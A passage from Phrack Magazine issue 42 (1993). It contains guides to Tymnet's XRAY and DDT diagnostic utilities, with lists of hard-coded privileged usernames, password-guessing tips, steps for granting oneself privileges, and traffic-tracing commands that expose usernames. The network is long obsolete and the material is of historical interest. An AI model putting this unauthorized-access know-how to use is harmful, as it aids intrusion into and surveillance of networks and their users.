  2311. setup.  It connected all calls placed through it as if they
  2312. were placed with an NUI.  This allowed hackers to place calls
  2313. to addresses that refused collect connections on networks
  2314. around the world.  This became a popular method for hackers
  2315. to access underground chat systems in Europe.  Additionally,
  2316. this network contained a score of computers belonging to a
  2317. major automobile manufacturer.  Most of these systems were
  2318. highly insecure.  The network also allowed unrestricted
  2319. access to network debug ports.  This particular network also
  2320. had a toll-free number on an MCI exchange.  At the time, MCI
  2321. was having some difficulty getting their equipment to accept
  2322. the ANI information to provide customers with a full call-
  2323. detail report on their monthly statement.  The hackers were
  2324. well aware of this fact and made frequent use of the network
  2325. with no fear of prosecution.  Eventually MCI was able to fix
  2326. their translation problem and were able to provide their
  2327. clients with full call-detail reports.  When this was
  2328. learned, many hackers abandoned use of the network, but
  2329. several others were later prosecuted for its usage when their
  2330. number turned up on the bill.
  2331.  
  2332. EXAMPLE THREE
  2333.  
  2334. Until quite recently intimate knowledge of the utilities
  2335. driving various packet-switched networks were known by an
  2336. exclusive few.  While investigating a network owned by an
  2337. extremely large Cleveland-based conglomerate hackers came
  2338. across a system where documentation on the usage of every
  2339. utility was kept online.  The hackers quickly downloaded all
  2340. the information and it soon became somewhat wide-spread among
  2341. the underground community.  With less-skilled and more
  2342. unscrupulous individuals in possession of this information
  2343. many networks began experiencing disruptions and system
  2344. integrity was quickly lost as hackers began monitoring data
  2345. traffic.
  2346.  
  2347. No information on the usage of packet networks or their
  2348. utilities should ever be kept online.  Hard copies should be
  2349. kept in the possession of the network administrator, and when
  2350. updated, obsolete versions must be destroyed.
  2351.  
  2352. WHAT TO DO
  2353.  
  2354. When a security violation stemming from a connection through
  2355. the packet network is noticed, Network Security should be
  2356. notified.  Clients of BT-Tymnet should notify Steve Matthews
  2357. at 408-922-7384.  Clients of Sprintnet should notify
  2358. Pat Sisson at 703-689-6913.
  2359.  
  2360. Once changes have been enacted in the network to prevent
  2361. further break-ins, the host computer should be checked
  2362. thoroughly for any changes or damages, and all individual
  2363. account passwords should be changed.
  2364.  
  2365. CONCLUSION
  2366.  
  2367. It is critical that the packet network be configured properly
  2368. and that all measures are taken to ensure its security.  Even
  2369. the most secure host computer can be easily compromised if it
  2370. is connected to an insecure packet network.
  2371. ----------------------------------------------------------------------
  2372.  
  2373.  
  2374.  
  2375.  
  2376. Date:     Tue Mar 23, 1993  7:02 pm  PST
  2377. From:     phrack
  2378.           EMS: INTERNET / MCI ID: 376-5414
  2379.           MBX: phrack@stormking.com
  2380.  
  2381. TO:       Mitchell K. Hobish / MCI ID: 116-6178
  2382. TO:       Anthony Weiner / MCI ID: 300-6908
  2383. TO:       Thomas J. Klotzbach / MCI ID: 375-1365
  2384. TO:       Andrew Koran / MCI ID: 396-7939
  2385. TO:       Pascal Lointier / MCI ID: 504-4319
  2386. TO:     * Berton Corson / MCI ID: 528-0397
  2387. TO:       Jeff Ubois / MCI ID: 554-3399
  2388. TO:       Multiple recipients of list
  2389.           EMS: INTERNET / MCI ID: 376-5414
  2390.           MBX: phrack@stormking.com
  2391. Subject:  Phrack 42/6-14
  2392.  
  2393.                       ==Phrack Magazine==
  2394.  
  2395.           Volume Four, Issue Forty-Two, File 6 of 14
  2396.           
  2397.  
  2398.                    A User's Guide to XRAY
  2399.  
  2400.                          By  N.O.D.
  2401.  
  2402.  
  2403. This file was made possible by a grant from a local
  2404. McDonnell Douglas Field Service Office quite some 'tyme'
  2405. ago.  This was originally written about version 4, although
  2406. we are pretty sure that BT has now souped things up to version 6.
  2407. Everything still seems the same with the exception of a few
  2408. commands, one of which we will point out in particular.
  2409.  
  2410. Any comments/corrections/additions/updates or subpoenas
  2411. can be relayed to us through this magazine.
  2412.  
  2413. XRAY is a monitoring utility that gives the user a real-time
  2414. window into a Tymnet-II node.  Used in tandem with other
  2415. utilities, XRAY can be a very powerful tool in monitoring network
  2416. activity.
  2417.  
  2418. In this file we will discuss key features of XRAY and give command
  2419. formats for several commands.  Some commands are omitted from this
  2420. file since they can only be used from dedicated terminals.  Several
  2421. others are likewise omitted since they deal with the utilization of
  2422. XRAY in network configuration and debugging the actual node code, and
  2423. would probably be more damaging than useful, and commands to reset
  2424. circuits and ports are similarly missing.
  2425.  
  2426.  
  2427. ACCESS
  2428.  
  2429. The most obvious way to access XRAY is to find the username/password
  2430. pair that either corresponds to the host number of an XRAY port, or
  2431. is otherwise in the goodguy list of a particular node.
  2432.  
  2433. XRAY can also be accessed through the DDT utility by typing
  2434.  
  2435.     ?STAT
  2436.  
  2437. Either will respond with the following
  2438.  
  2439. **X-RAY**  NODE:  XXX   HOST:  ZZZ  TIME:  DD:HH:MM:SS
  2440.  
  2441. If all ports are currently in use the user will only be allowed access
  2442. if his/her is of greater precedence in the goodguy list than that of
  2443. someone previously online.  In such a case, that user will be forcibly
  2444. logged out and will receive the following message:
  2445.  
  2446.     "xray slot overridden"
  2447.  
  2448. Otherwise the user will see:
  2449.  
  2450.     "out of xray slots"
  2451.  
  2452. XRAY users are limited in their power by the associated "licence" level
  2453. given them in the XRAY goodguy list.  The levels are:
  2454.  
  2455.     0 - normal
  2456.     1 - privileged
  2457.     2 - super-privileged
  2458.  
  2459.  
  2460. There are several user names associated with the
  2461. XRAY utility.  These exist on almost any network utilizing
  2462. the Tymnet-II style networking platform.
  2463.  
  2464.   PRIORITY    USERNAME
  2465.  
  2466.      2        XMNGR
  2467.      2        ISISTECX
  2468.      2        XNSSC
  2469.      1        TNSCMX
  2470.      1        TNSUKMX
  2471.      1        XSOFT
  2472.      1        XEXP
  2473.      1        XCOMM
  2474.      1        XSERV1
  2475.      0        XRTECH
  2476.      0        XTECH
  2477.      0        XOPPS
  2478.      0        XSERV
  2479.      0        XRAY
  2480.  
  2481.  
  2482.  
  2483. COMMANDS  with parameters in <brackets>
  2484.  
  2485. HE  Help
  2486.  
  2487.     Use this command to display the commands available for that
  2488.     particular node.
  2489.  
  2490. GP  Get power <security string>
  2491.  
  2492.     This command allows the user to move up to the maximum security
  2493.     level allowed by his username, as specified in the good guy
  2494.     list.
  2495.  
  2496. XG  Display and/or modify XRAY goodguy list <entry number> <P/M>
  2497.  
  2498.     This command without parameters will display the XRAY goodguy
  2499.     list.  When added with an entry number and 'P' (purge) or
  2500.     'M' (modify), the user can edit the contents of the table.
  2501.     The XGI command will allow the user to enter a new entry
  2502.     into the list.  Any use of XG or XGI to alter the list is
  2503.     a super-privileged command and is audited.
  2504.  
  2505.     >XG
  2506.  
  2507.     XRAY GOODGUY LIST
  2508.  
  2509.     NO.   PRIV  OVER  NAME
  2510.     ----  ----  ----  ----
  2511.     0001  0002  00FF  TIIDEV
  2512.     0002  0001  0030  RANDOMUSER
  2513.     0003  0000  0000  XRAY
  2514.  
  2515.     >XGI
  2516.  
  2517.     ENTER UP TO 12 CHARACTERS OF USERNAME
  2518.  
  2519.     NOD
  2520.  
  2521.     ENTER NEW PRIVILEGE AND OVERRIDE - 2,FF
  2522.  
  2523.     >XG
  2524.  
  2525.     XRAY GOODGUY LIST
  2526.  
  2527.     NO.   PRIV  OVER  NAME
  2528.     ----  ----  ----  ----
  2529.     0001  0002  00FF  TIIDEV
  2530.     0002  0001  0030  RANDOMUSER
  2531.     0003  0000  0000  XRAY
  2532.     0004  0002  00FF  NOD
  2533.  
  2534. BG  Display and/or modify Bad Guy List <node number> <R/I>
  2535.  
  2536.     This command when entered without any parameters displays the
  2537.     "bad guy" list.  When used with a node number and 'R' it will remove
  2538.     that node from the list, and 'I' will included.  The 'R' and 'I'
  2539.     features are privileged commands and usage is noted in audit trails.
  2540.  
  2541.     >BG
  2542.  
  2543.     2000 701 1012
  2544.  
  2545.     >BG 2022 I
  2546.  
  2547.     2022 2000 701 1012
  2548.  
  2549. HS  Display host information
  2550.  
  2551.  
  2552.  
  2553. ND  Display node descriptor
  2554.  
  2555.     This command displays information about the node and its network
  2556.     links.
  2557.  
  2558. NS  Display node statistics
  2559.  
  2560.     This command displays various statistics about the node including
  2561.     time differentiations in packet loops, which can then be used to
  2562.     determine the current job load on that particular node.
  2563.  
  2564. KD  Display link descriptor <linked node>
  2565.  
  2566.     This command displays the values of the link to the node specified.
  2567.     This is displayed with columns relating to type of node (TP), speed
  2568.     of the link (SP), number of channels on the link (NCHN), etc..
  2569.  
  2570. KS  Display link statistics <up to 8 node numbers>
  2571.  
  2572.     This command provides a report on various factors on the integrity
  2573.     of the link to the given node(s), such as bandwidth usage, packet
  2574.     overhead, characters/second transmitted, delays in milliseconds, etc.
  2575.  
  2576. BZ  "Zap" link to node <node number>
  2577.  
  2578.     This command will cause the link to the specified node to be
  2579.     reset.  This command is privileged and is audited.  If the node
  2580.     "zapped" is not currently linked a "??" error message will be
  2581.     displayed.
  2582.  
  2583. TL  Set/Reset trace on link  <node number>
  2584. TN  Set/Reset trace on line  <node number>
  2585. TM  Display trace events     <B(ackground) / F(oreground)>
  2586.  
  2587.     These commands are used to display activity between two active
  2588.     nodes.
  2589.  
  2590.  
  2591. AC  Display active channels <starting channel> <range of channels>
  2592.  
  2593.     This command will display all active channel numbers for the given
  2594.     range starting at the given channel number.  Range is in hex.
  2595.  
  2596. QC  Query channel status <channel number>
  2597.  
  2598.     This command displays information about the given channel,
  2599.     including throughput speed, source and output buffer size and
  2600.     address location.
  2601.  
  2602.  
  2603. TC  Enable/disable data trace on channel <channel number> <0/1>
  2604.  
  2605.     This command with no arguments displays the channels
  2606.     that are being diagnosed by the trace.  The command with
  2607.     a channel number and a '1' will enable data trace for that
  2608.     channel, and a '0' will disable trace on that channel.  Enabling
  2609.     or disabling trace is a privileged command.
  2610.  
  2611. TD  Display channel trace data in hex  <count> <I/O>
  2612. TE  Display channel trace data in hex including escapes <count> <I/O>
  2613. TA  Display channel trace data as ASCII  <count> <I/O>
  2614.  
  2615.     With these commands trace data is displayed for a specified
  2616.     time count.  A prefixed 'I' or 'O' will show input or output
  2617.     data.  The default is both.
  2618.  
  2619.     >ta 5
  2620.  
  2621.     I/O   CHN   TIME
  2622.     OUT  0040   ECC5  \86\86\0F\00\8A\80h\80\8CS\83valinfo;
  2623.     IN   0040   EC87  \00\09\86\86\0D\08\00\00h
  2624.     OUT  0040   0F67  \86\86\0E\00\880\8D
  2625.     IN   0040   1029  \00,\86\86\09\86\00\00\90\1B\19\80 \06\86\00\00h
  2626.                       \15\1B\08J\04\0B\04\0F\04=\0DR\80JS\80\80
  2627.                       \8CVALINFO\8D
  2628.     OUT  0040   102F  \86\86\14\89p\90\1B\19\86\86\14\89j\18\15\13
  2629.  
  2630. **Note:  Although this will allow one to follow the network connections
  2631.          on specific channels, password data is filtered out.  As you
  2632.          can see from the above example, usernames are not.  Many
  2633.          usernames do not have passwords, as you all know.  **
  2634.  
  2635. On more recent versions of XRAY a similar command "DR" performs a
  2636. similar function to the trace commands, but shows both hex and
  2637. ascii of the data in memory registers of the node.
  2638.  
  2639.     >DR
  2640.  
  2641.     I NOS 0001 A0  *
  2642.     I SND 0001 A1  *  !
  2643.     I DTA 4920 616D 2061 6E20 6964 696F 7420 6265  *I am an idiot be*
  2644.           0002 9D63 6175 7365 2049 206C 6566 7420  *   cause I left *
  2645.           6D79 7365 6C66 206C 6F67 6765 6420 696E  *myself logged in*
  2646.           2061 6E64 2077 656E 7420 686F 6D65 2E0D  * and went home. *
  2647.           6F70 7573 2520 0D0A 0D0A 0D0A 0D0A 0D0A  *opus%           *
  2648.  
  2649. BS  Display bufferlet use statistics
  2650.  
  2651.     This command shows the current and past usage of the memory
  2652.     allocated to data buffering.  This shows total usage, total peak
  2653.     usage, and available buffer size.
  2654.  
  2655. RB  Read buffer <buffer index>
  2656.  
  2657.     This command displays the entire contents of the given buffer.
  2658.     This is a privileged command and its use is not primarily for user
  2659.     circuits.  Primarily.
  2660.  
  2661.     >RB 69
  2662.  
  2663.     50 61 72 74 79 20 6F 6E 20 64 75 64 65 21 21 21
  2664.  
  2665. WB  Write buffer <buffer index>
  2666.  
  2667.     This command writes up to seven bytes into the specified buffer.
  2668.     The buffer must greater than 4.  This is also a privileged command.
  2669.  
  2670. CD  Set/reset CRYPTO auto display mode <Y/N>
  2671. CL  Display CRYPTO log <number of minutes>
  2672. CM  Display CRYPTO messages by type
  2673. SM  Enable/Disable CRYPTO messages by type
  2674.  
  2675.     CRYPTO messages are informational messages about the activity of
  2676.     the node.  Up to 256 such entries are stored in a circular buffer
  2677.     to record this activity.  You can turn on automatic reporting
  2678.     of these messages with the CD command prefixed with a 'Y' for
  2679.     on and 'N' for off.  Certain message types that become bothersome
  2680.     can be disabled with the SM command and the message type.
  2681.  
  2682. DB  Begin delay measurement
  2683. DD  Display delay measurement statistics
  2684. DE  Terminate delay measurement
  2685. DL  Begin data loopback circuit
  2686.  
  2687.     These commands are used to build circuits for testing the speed and
  2688.     integrity of data flow between two nodes.  The DL command is
  2689.     super privileged and only one such circuit can be built on
  2690.     a node at a given time.  The data traffic generated by the DL is for
  2691.     diagnostic use only and can be monitored by viewing node and link
  2692.     statistics.
  2693.  
  2694. PM  Measure performance on a channel <channel number>
  2695.  
  2696.     This command measures the performance of a given channel by
  2697.     inserting a timing sequence into the packet stream.  Once it has
  2698.     reached the given channel it is returned and a value corresponding
  2699.     to the total time elapsed in milliseconds is displayed.  If the
  2700.     channel is not active, or no response is returned in 8 seconds the
  2701.     message "BAD CHANNEL OR TIMEOUT" is displayed.
  2702.  
  2703. LE  Set local echo mode
  2704. RE  Set remote echo mode
  2705.  
  2706.     One would use the set local echo command if the XRAY terminal
  2707.     is not echoing commands typed by the user.  By default, XRAY does
  2708.     not echo output.
  2709.  
  2710.  
  2711. SUMMARY
  2712.  
  2713.     XRAY is pretty confusing.  Be careful with what you are doing
  2714.     since you are essentially prodding around in the memory of the
  2715.     node.  Think of it in terms of using a utility to poke and prod
  2716.     the memory of your own computer.  Think of how disastrous a
  2717.     command written to the wrong portion of memory can be.  Don't
  2718.     do anything stupid, or you might bring down a whole network,
  2719.     or at minimum lose your access.
  2720.  
  2721.  
  2722.  
  2723.  
  2724. Date:     Tue Mar 23, 1993  7:50 pm  PST
  2725. From:     phrack
  2726.           EMS: INTERNET / MCI ID: 376-5414
  2727.           MBX: phrack@stormking.com
  2728.  
  2729. TO:       Mitchell K. Hobish / MCI ID: 116-6178
  2730. TO:       Anthony Weiner / MCI ID: 300-6908
  2731. TO:       Thomas J. Klotzbach / MCI ID: 375-1365
  2732. TO:       Andrew Koran / MCI ID: 396-7939
  2733. TO:       Pascal Lointier / MCI ID: 504-4319
  2734. TO:     * Berton Corson / MCI ID: 528-0397
  2735. TO:       Jeff Ubois / MCI ID: 554-3399
  2736. TO:       Multiple recipients of list
  2737.           EMS: INTERNET / MCI ID: 376-5414
  2738.           MBX: phrack@stormking.com
  2739. Subject:  Phrack 42/5-14
  2740.  
  2741.                              ==Phrack Magazine==
  2742.  
  2743.                  Volume Four, Issue Forty-Two, File 5 of 14
  2744.  
  2745. = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -
  2746.  
  2747.                     Synopsis of Tymnet's Diagnostic Tools
  2748.                              and their associated
  2749.                    License Levels and Hard-Coded Usernames
  2750.  
  2751.                                     by
  2752.                               Professor Falken
  2753.  
  2754.                              February 14, 1993
  2755.  
  2756. = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -
  2757.  
  2758.  
  2759.    While the scope of this article is general, the information contained
  2760. within is NOT for the novice Tymnet explorer.  Novice or NOT, go ahead
  2761. and read; however, caution should be taken when invoking any of these
  2762. commands upon BT's network.  Execution of certain commands can have
  2763. debilitating consequences upon segments of the network.
  2764.  
  2765.    In this article I intend to educate the reader about the various
  2766. Tymnet diagnostic utilities that are available.  This article is by no
  2767. means an in depth microscopic view of the utilities; but rather a brief to
  2768. the point survey course of what is available to qualified people.  With
  2769. each utility I will describe its use/s, list its major commands, and
  2770. in DDT & XRAY's case, dispense its hard-coded usernames which allow you to
  2771. become a 'qualified person.'
  2772.  
  2773.    It seems the software engineers at Tymnet (for the lack of something
  2774. better to do) like to rename ordinary words to complicated ones.  For
  2775. instance, within this article I will talk about LICENSE LEVELS.  License
  2776. levels are nothing more than security levels.  When I speak of License
  2777. Level 4, just translate that to Security Level 4.  I would have just called
  2778. everything security levels, but I wanted to stay within that lethargic
  2779. Tymnet mood for realism purposes.  Another word the engineers pirated from
  2780. 'GI JOE' was GOOD-GUYS.  In our world, a Good-Guy is a valid username that
  2781. can be used for logging into the various diagnostic utilities.
  2782.  
  2783.    Like most conventional computers, Tymnet also needs an operating system
  2784. for its code to run under.  Tymnet's node-level, *multitasking*, operating
  2785. system is called ISIS; it stands for 'Internally Switched Interface System.'
  2786. Its designed for: handling multiple communication links, allocating system
  2787. memory, system job/process scheduling, and all the other BASIC things ALL
  2788. operating systems do.  Tymnet explains it a bit more complicated and less
  2789. to the point, but to give equal time to the opposing viewpoint, this is
  2790. what they say:
  2791.  
  2792.    "Internally Switched Interface System. The operating system for a TYMNET
  2793.     node; provides functions that control the overall operation of an
  2794.     Engine.  These functions include, but are not limited to, memory
  2795.     allocation, message switching, job scheduling, interrupt processing,
  2796.     and I/O distribution. ISIS allows multiple data communications
  2797.     functions to run on a single processor.  Two of its many services are
  2798.     debugging and I/O port management. Formerly known as ISIS-II or ISIS2.
  2799.     ISIS2, ISIS-II  Obsolete terms. See Internally Switched Interface
  2800.     System (ISIS)."
  2801.  
  2802.    At various points within this file I will refer to an ENGINE.
  2803. Basically, an ENGINE is a minicomputer which handles all the processing
  2804. requirements that ISIS and its applications demand.  However, to be fair to
  2805. all the Tymnet technoids, this is what BT says:
  2806.  
  2807.    "BT North America packet-handling hardware. The Engine communications
  2808.     processor is a member of a family of special-purpose minicomputers.
  2809.     It runs communications software such as Node Code (for switching),
  2810.     slot code (for protocol conversion and value-added functions), and
  2811.     the ISIS operating system. The Engine family consists of the
  2812.     Pico-Engine, Micro-Engine, Mini-Engine, Mini-Engine-XL,
  2813.     Dual-Mini-Engine-XL, Engine, and ATC."
  2814.  
  2815.    You think they would have invented much NEATER names for their computer
  2816. platforms than 'Mini-Engine' or 'Micro-Engine'.  I would guess that BT's
  2817. hardware engineers have less time than the software engineers to invent
  2818. K-RAD names for their projects.  Anyhow, as you can see, the ENGINE is the
  2819. muscle behind Tymnet's network brawn.
  2820.  
  2821.    Another term which is very basic to ANY understanding of Tymnet is the
  2822. 'SUPERVISOR.'  As you can see the engineers searched high & low for this
  2823. clever term.  The Supervisor is many things including, the authentication
  2824. kernel you interact with, the circuit billing system that subscribers
  2825. unfortunately do not interact with, and generally the network's 'BIG BROTHER.'
  2826. Supervisor watches the status of the network at all times, keeping detailed
  2827. logs and interceding when trouble erupts.  The supervisor term can also
  2828. refer to the engine upon which the Supervisor is being run on.
  2829.  
  2830.    With all that in mind, I will now introduce five of Tymnet's diagnostic
  2831. tools.  I intend on presenting them in this order: DDT, MUX, PROBE, LOAD-II,
  2832. TOM, and XRAY.  Please note that only DDT and XRAY have 'good-guy' lists
  2833. provided.
  2834.  
  2835. DDT - Dynamic Debugging Tool
  2836. ----------------------------
  2837.  
  2838.    DDT is a utility which runs under the ISIS operating system.  DDT is
  2839. capable of loading or displaying a slot's content.  A slot is an area of
  2840. memory in a node in which Tymnet applications run.  DDT can also be used
  2841. for modification of a specific slot's slot code.  Slot code is any
  2842. program which has been assigned memory within the engine by ISIS.  DDT also
  2843. performs other lower level diagnostic functions, which I will not go into.
  2844.  
  2845.    Logging into DDT requires you to provide the 'please log in:' prompt
  2846. a valid username and password.  Upon checking the good-guy list and
  2847. authenticating the user, the kernel process searches for the associated
  2848. slot assignment.  If no slot is assigned to the good-guy, the kernel will
  2849. prompt you for a slot number.  Once you enter a VALID slot number and it is
  2850. available, the authentication kernel executes the DDT utility.  When I say
  2851. 'VALID' slot number, I mean a slot number which logically exists AND is
  2852. attainable by your current good-guy's license level.
  2853.  
  2854.    Actual logins to DDT take the form:
  2855.  
  2856.    please log in: goodguyID:host# <cr>
  2857.         password:
  2858.  
  2859. Where goodguyID is a valid goodguy, host# is the Tymnet subscriber who
  2860. needs a little 'work' done, and obviously the password is what it is.  While
  2861. I would like to give you all the passwords I could, I don't think it is
  2862. going to happen.  So all I can do is suggest trying different variations
  2863. of the goodguy IDs, and other dumb passwords unsecure people use.
  2864.  
  2865.    Connection to primary DDT is displayed as the ever-so-friendly '*' prompt.
  2866. It is from this prompt that all general DDT commands are directed.  The most
  2867. useful DDT commands are listed below in a general, extended, and RJE/3270T
  2868. specific registry.
  2869.  
  2870.  
  2871. GENERAL DDT COMMANDS
  2872. --------------------
  2873.  
  2874. E            Execute a slot.
  2875. H            Halt a slot. <---- DESTRUCTIVE See WARNING!
  2876. ZZ           Logs you out of DDT.
  2877. ^#           Transfers control from the current slot to the slot
  2878.              specified by #. (IE- ^7  Switches control to slot 7)
  2879. ?CPU         Displays CPU utilization (Engine Performance)
  2880. ?HIST        Displays a history of diagnostic messages.
  2881. ?HOST        Displays the hosts in use by that slot.
  2882. ?LU          Displays the logical unit to physical device assignment.
  2883. ?MEM         Displays the time of memory errors if any.
  2884. ?STAT        Allows the execution of EXTENDED DDT.  To obtain the extended
  2885.              command prompt type '/'.Command prompt ':>'
  2886. ?VERN        Displays the ISIS version followed by the SLOT's version.
  2887.  
  2888.  
  2889. WARNING!: It is possible to HALT a slot accidently.  This will freeze
  2890.           everything going in/out of the current slot.  This can be BAD
  2891.           for customer satisfaction reasons.  If you accidently hit 'H',
  2892.           even without a CR/LF it will hang the slot.  So when the ?HIST or
  2893.           ?HOST commands are used make SURE you type that important '?'
  2894.           beforehand.  This will halt everything going over that slot,
  2895.           effectively destroying the communication link.
  2896.  
  2897.  
  2898. EXTENDED COMMANDS FOR RJE & 3270T
  2899. ---------------------------------
  2900.  
  2901. RJE & 3270T
  2902. ===========
  2903. EXI          Logs you out. (DuH!)
  2904. QUIT         Return from extended DDT prompt ':>' to normal '*' DDT prompt.
  2905.  
  2906. RJE Only
  2907. ========
  2908. HELP         Displays a list of commands available in extended RJE DDT mode.
  2909.              (A list not worth putting in here.)
  2910. SCOPE        Outputs a protocol trace.
  2911. TRACE        Outputs a state trace.
  2912.  
  2913. 3270T Only
  2914. ==========
  2915. HELP         Displays a list of commands available in extended 3270T DDT mode.
  2916.              (Again, a list not worth putting in here.)
  2917. STATUS       Displays status of all lines, control units, and devices.
  2918. STRTLN x     Start polling on line x. (Performance benchmark)
  2919. STRTCU x,y   Start polling control UNIT x on LINE y. (Performance benchmark)
  2920. STOPLN x     Stop polling on line 'x'
  2921. STOPCU x,y   Stop polling control UNIT x on LINE y.
  2922.  
  2923. NOTE:If you try to use an RJE command while logged into a 3270T you will
  2924.      be shown the incredible "ILLEGAL COMMAND" string.
  2925.  
  2926.  
  2927. GOOD-GUYS AND LICENSE LEVELS
  2928. ----------------------------
  2929.  
  2930.    As with any username, there is an accompanying license level (security
  2931. level) with each account.  The different levels define which types of
  2932. slots that username may access and the available commands.  Some of the
  2933. good-guys have access to all slots including supervisor, while others
  2934. have access to only non-supervisor slots.
  2935.  
  2936.    The table below is a list of the actions that are available with the
  2937. various different license levels.
  2938.  
  2939. L.DISC    Permits disk formatting
  2940. L.H       Permits the halting, loading, and restarting of all slots for
  2941.           code-loading purposes.
  2942. L.P       Permits the halting, restarting, and online software modification
  2943.           to an active slot. (Except slots 0 and FF)
  2944. L.R       Permits logon to all slots (Except 0 and FF)
  2945. L.SOA     Permits logon to a node's slot 0. (Node configuration.)
  2946. L.SOP     Permits the halting, restarting, and online software modification
  2947.           to slot 0.
  2948. L.SOR     Permits the reading of slot 0 files.
  2949. L.SUA     Permits logon to Supervisor slots.
  2950. L.SYA     Permits logon to a node's FF slot. (ISIS configuration node.)
  2951. L.SYR     Permits the reading of slot FF files.
  2952. L.SYP     Permits the halting, restarting, and online modification to
  2953.           slot FF.
  2954.  
  2955.    The DDT license levels are numbered from 0 to 4, 4 being Gh0D.  Each level
  2956. has several of the above named actions available to them.  Listed below are
  2957. the various actions available at the 0 through 4 license levels.
  2958.  
  2959. LEVEL   ACTIONS
  2960. =====   =======
  2961.   4     L.DISC, L.P, L.SOA, L.SOP, L.SUA, L.SYA, and L.SYP .
  2962.         (Disk format, halt, restart, online software mods, and reading
  2963.          of files for all slots AND supervisors. Like I said, GOD.)
  2964.  
  2965.   3     L.P, L.SOA, L.SOP, L.SYA, and L.SYP .
  2966.         (Halt, restart, online software mods, and reading of files for
  2967.          all slots and supervisors.)
  2968.  
  2969.   2     L.H, L.R, L.SOA, L.SOR (For code loading purposes: halt, restart
  2970.         online software mods, and reading files for all slots and
  2971.         supervisor nodes.)
  2972.  
  2973.   1     L.R, L.SOA, L.SYA (Views ALL slots and supervisor nodes)
  2974.  
  2975.   0     L.R (Views all slots, EXCEPT supervisor slots and 0 & FF.)
  2976.  
  2977.    What follows is a good-guy userlist with the associated license level
  2978. of that username.  I also note whether the account is ACTIVE/PASSIVE upon
  2979. an operating node/slot combination and the seriousness of the network
  2980. impact that those associated licenses can possibly create.
  2981.  
  2982.       LICENSE LEVEL    GOOD GUY USERNAME     ACTIVE/PASSIVE  NETWORK IMPACT
  2983.       =============    =================     ==============  ==============
  2984.             4             ISISTECH               Active           MAJOR
  2985.             4             NGROM                  Active           MAJOR
  2986.             4             NSSC                   Active           MAJOR
  2987.             4             RPROBE                 Active           MAJOR
  2988.             4             RERLOG                 Active           MAJOR
  2989.             4             RACCOUNT               Active           MAJOR
  2990.             4             RSYSMSG                Active           MAJOR
  2991.             4             RUN2                   Active           MAJOR
  2992.             4             TNSCM                  Active           MAJOR
  2993.  
  2994.             3             IEXP                   Active         Moderate
  2995.             3             ISERV1                 Active         Moderate
  2996.             3             ISERV2                 Active         Moderate
  2997.             3             ISERV3                 Active         Moderate
  2998.             3             ITECH1                 Active         Moderate
  2999.             3             ITECH2                 Active         Moderate
  3000.             3             ITECH3                 Active         Moderate
  3001.             3             ITECH4                 Active         Moderate
  3002.             3             ITECH5                 Active         Moderate
  3003.  
  3004.             2             GATEWAY                Active           Minor
  3005.  
  3006.             1             DDT                    Passive
  3007.             1             DDTECH                 Passive
  3008.             1             IOPPS                  Passive
  3009.             1             ISERV                  Passive
  3010.             1             ITECH                  Passive
  3011.  
  3012.             0             VADICBUSY              Passive
  3013.  
  3014.  
  3015. MUX - The Circuit Multiplexer
  3016. -----------------------------
  3017.  
  3018.    MUX is a tool which also runs within an ISIS slot.  MUX allows the
  3019. building, interconnecting, and controlling of several sets of circuits from
  3020. a single terminal.  Instead of logging in and out of each diagnostic
  3021. tool as different commands are needed, MUX is used to create multiple
  3022. concurrent circuits.  Once these are set up, it is easy to switch back
  3023. and forth between different diagnostic applications, WITHOUT having to
  3024. logoff one before logging into another.  Tymnet also likes to boast that
  3025. you can chat with other users on MUX's 'Talk mode facility.'  I'll stick
  3026. to IRC until this catches on.
  3027.  
  3028.    Logging into MUX is quite simple.  It takes the form of:
  3029.  
  3030.    please log in: userid <cr>
  3031.         password:
  3032.  
  3033. NOTE: ATTN commands, see CHAR command.
  3034. ATTN ATTN       Allows you to send one attention character down the circuit.
  3035. ATTN C x        Labels the current port, where 'x' is the label you desire.
  3036. ATTN E          Allows you to switch to the next port you have defined.
  3037.                 This command however is not valid from the command mode.
  3038.                 The circuit label is presented and connection is made.
  3039.                 Even though the prompt for that circuit is not presented,
  3040.                 you ARE connected.
  3041. ATTN Z          Returns you to the command mode.
  3042.  
  3043. CHAR char       Configures your ATTN character to 'char'.  So in the below
  3044.                 ATTN commands, you will have to enter your ATTN character
  3045.                 then the proceeding character.  The default ATTN Character
  3046.                 is CTRL-B.  Personally, I like to set mine to '!'.
  3047. CONNECT pl1,pl2 Connect the output of port label-1 to port label-2.
  3048.                 Usually your current port label is marked with a * preceding
  3049.                 it in a 'LIST', this is also known as a BOSS.
  3050.  
  3051. ENABLE pl       Enables a pl's (port labels) output.
  3052. EXIT            Leave MUX with all your circuits INTACT.
  3053.  
  3054. FLUSH pl        Flush pl's (port labels) output.
  3055. FREEZE N/F      Freeze (N=ON or F=OFF) current Boss.
  3056.  
  3057. GREETING msg    Sets up the greeting message.
  3058.  
  3059. HEAR N/F        Allow (N=ON or F=OFF) users to 'TALK' to each other.
  3060. HELP            Prints help messages. (ooof)
  3061.  
  3062. LIST            Lists all active ports for the current user. (ATTN Z L)
  3063. LABEL N/F       Labeling (N=ON or F=OFF) of all output sent to the Boss.
  3064.  
  3065. MAKE            Make a new circuit by logging onto a diagnostic tool.
  3066.                 You will be prompted with the omnipresent 'Please log in:'
  3067.                 prompt.  Just login as usual for particular tool.
  3068. MESSAGE         Print last message.
  3069.  
  3070. QUIT            Leave MUX and ZAP all circuits created.
  3071.  
  3072. SEND pl         Send to pl (port label).
  3073.  
  3074. TALK username   Talks to 'username' providing HEAR=N.
  3075. TIME            Outputs date and time in format: 31Dec93 05:24
  3076. TRANSFER pl     Transfers control of this BOSS to pl (port label).
  3077.  
  3078. ZAP pl          Zap any circuits you made, where 'pl' is the port label.
  3079.                 This command defaults to the port labeled '*' (Boss).
  3080.                 This command is ONLY valid in command mode.
  3081.  
  3082. PROBE
  3083. -----
  3084.  
  3085.    PROBE is probably one of the BEST known Tymnet diagnostic tools.
  3086. PROBE is actually a sub-program of the Supervisor.  PROBE is capable of
  3087. monitoring the network, and it has access to current pictures of
  3088. network topology, including host tables and node descriptors.  PROBE
  3089. shares common memory with the Supervisor and has circuit tracing
  3090. capability.  PROBE can be used to check the history of nodes & links,
  3091. boot a node, trace a circuit, and reset a link or shut one down.
  3092. PROBE can be access directly or through TMCS (Tymnet Monitoring
  3093. and Control System.)
  3094.  
  3095.    To access PROBE from within TMCS you would enter the command:
  3096.  
  3097. PROBE s    Where 's' is the active or 'sleeping' supervisor.
  3098.  
